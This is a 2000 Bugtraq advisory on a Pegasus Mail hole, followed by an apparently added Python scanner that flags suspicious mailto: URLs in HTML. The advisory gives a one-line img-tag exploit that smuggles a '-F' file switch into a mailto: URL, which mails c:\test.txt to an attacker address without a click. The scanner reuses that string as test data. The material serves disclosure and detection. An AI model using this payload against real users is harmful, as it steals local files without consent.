[17018] in bugtraq


Pegasus mail file reading vulnerability

daemon@ATHENA.MIT.EDU (Imran Ghory)
Tue Oct 3 12:50:57 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Message-Id:  <39DA09DB.32334.36AE40@localhost>
Date:         Tue, 3 Oct 2000 16:31:23 +0100
Reply-To: Imran Ghory <ImranG@BTINTERNET.COM>
From: Imran Ghory <ImranG@BTINTERNET.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

SUMMARY

The default setup of Pegasus Mail contains a remotely exploitable security
hole that allows a remote website to gain copies of files on the user's hard
drive.

DETAILS

Version tested: Pegasus Mail v3.12c with IE5.0

When the webpage containing the exploit code is viewed using IE5,
Pegasus Mail will automatically create a message which has a copy
of the file "c:\test.txt" and is addressed to "hacker@hakersite.com" and
queues it ready to be sent without any further user intervention.

If instead of "hacker@hakersite.com" we have a local user,
"hacker", the message won't be queued but just sent immediately.

Exploit code:

<img src="mailto:hacker@hakersite.com -F c:\test.txt">

Temporary Fix:

1) Don't run Pegasus Mail at the same time as a web browser

This is not a complete solution as Pegasus Mail will load up if the exploit
code is run, but this at least will be more noticeable to the user.

Vendor:

As I earlier posted a message to vuln-dev giving the basics of this exploit
without realizing the consequences (at that stage the user had to click on
a link for the exploit to come into play), I have decided to publish the full
exploit before contacting the vendor.

--
Imran Ghory
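The post above shows a mailto: URL that carries what looks like a command-line switch and a file path, placed in an attribute the browser fetches without a click. The following Python is an added example, not code from the post or from Pegasus Mail, written from the defender's side: it scans an HTML document (or a mail body) for mailto: URLs, reports ones that sit in auto-loaded resources such as img src, and checks the address part against RFC 2368 structure, where whitespace, "-switch" tokens and file paths never legitimately appear. The HTML samples are constructed for this example; the only page-derived value is the exploit string itself.

```python
"""Detect mailto: URLs that smuggle switches or paths into a URL handler.

Added example from a defender's perspective; not part of the bugtraq post.
The sample HTML below is constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Attributes that can carry a URL the browser or a protocol handler will act on.
URL_ATTRS = {"src", "href", "data", "action"}
# Tags where the user has to click before the URL is dispatched; anything
# else carrying a mailto: is dispatched automatically when the page renders.
CLICK_TAGS = {"a", "area"}

# RFC 2368 address part: comma-separated addresses, then an optional ?query of
# header fields.  A handler that pastes the address part onto a command line is
# where this breaks, so flag tokens that only make sense on a command line.
SWITCH_TOKEN = re.compile(r"(^|\s)-[A-Za-z]\S*")
PATH_TOKEN = re.compile(r"[A-Za-z]:\\|/|\\")


def classify_mailto(url: str) -> dict:
    """Split a mailto: URL into address part and header fields, and list
    anything in the address part that looks like a switch or a file path."""
    if not url.lower().startswith("mailto:"):
        raise ValueError("not a mailto: URL")
    rest = url[len("mailto:"):]
    addr_part, _, query = rest.partition("?")
    headers = parse_qs(query) if query else {}
    findings = []
    if any(ch.isspace() for ch in addr_part):
        findings.append("whitespace in address part")
    if SWITCH_TOKEN.search(addr_part):
        findings.append("switch-like token in address part")
    if PATH_TOKEN.search(addr_part):
        findings.append("path-like token in address part")
    return {"address": addr_part, "headers": headers, "findings": findings}


class MailtoScanner(HTMLParser):
    """Collects every URL-bearing attribute whose value is a mailto: URL."""

    def __init__(self):
        super().__init__()
        self.hits = []  # (tag, attribute name, url) in document order

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value and value.lower().startswith("mailto:"):
                self.hits.append((tag, name, value))


def scan_html(html: str) -> list:
    """Return one record per suspicious mailto: URL found in the document."""
    scanner = MailtoScanner()
    scanner.feed(html)
    scanner.close()
    results = []
    for tag, attr, url in scanner.hits:
        info = classify_mailto(url)
        findings = list(info["findings"])
        if tag not in CLICK_TAGS:
            # The post's key point: no click is needed when the URL is a resource.
            findings.insert(0, f"mailto: in auto-loaded resource ({tag} {attr})")
        if findings:
            results.append({"tag": tag, "attr": attr, "url": url, "findings": findings})
    return results


# Constructed sample: one legitimate contact link, the pattern from the post,
# and the earlier click-required variant the author mentions.
SAMPLE_HTML = """
<a href="mailto:support@example.invalid?subject=Question">Contact</a>
<img src="mailto:hacker@hakersite.com -F c:\\test.txt">
<img src="/images/logo.png">
<a href="mailto:hacker -F c:\\test.txt">click me</a>
"""

if __name__ == "__main__":
    for record in scan_html(SAMPLE_HTML):
        print(f"<{record['tag']} {record['attr']}> {record['url']}")
        for f in record["findings"]:
            print("   -", f)
```

The same `classify_mailto` check can sit in front of any mailto: handler registration: refuse to dispatch when `findings` is non-empty, since a conforming URL never needs whitespace or a dash-prefixed token before the `?` query.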
